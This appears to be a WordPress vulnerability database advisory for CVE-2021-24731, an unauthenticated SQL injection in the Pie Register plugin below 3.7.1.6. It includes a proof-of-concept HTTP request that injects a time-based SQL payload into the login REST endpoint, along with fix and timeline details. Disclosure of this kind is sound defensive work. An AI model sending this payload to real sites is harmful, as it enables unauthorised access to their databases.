Pie Register < 3.7.1.6 – Unauthenticated SQL Injection | CVE 2021-24731 | Plugin Vulnerabilities

Description

The plugin does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.

Proof of Concept

POST /wp-json/pie/v1/login HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 43
Connection: close

user_login='%20OR%20SLEEP(1)--&login_pass=a

Affects Plugins

Fixed in 3.7.1.6

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

AyeCode Ltd

Submitter

Stiofan

Submitter website

https://ayecode.io/

Submitter twitter

Verified

Yes

WPVDB ID

6bed00e4-b363-43b8-a392-d068d342151a

Timeline

Publicly Published

2021-10-11 (about 4 years ago)

Added

2021-10-11 (about 4 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2023-05-15

Title

AutomateWoo < 5.7.2 - ShopManager+ SQLi

Published

2025-07-16

Title

SMTP for Amazon SES < 1.9.1 - Authenticated (Administrator+) SQL Injection

Published

2023-09-11

Title

WP Sessions Time Monitoring Full Automatic < 1.0.9 - Unauthenticated SQL injection

Published

2024-12-05

Title

YouTube Gallery and Vimeo Gallery Plugin < 2.4.3 - Authenticated (Administrator+) SQL Injection

Published

2025-04-09

Title

WP Online Users Stats <= 1.0.0 - Unauthenticated SQL Injection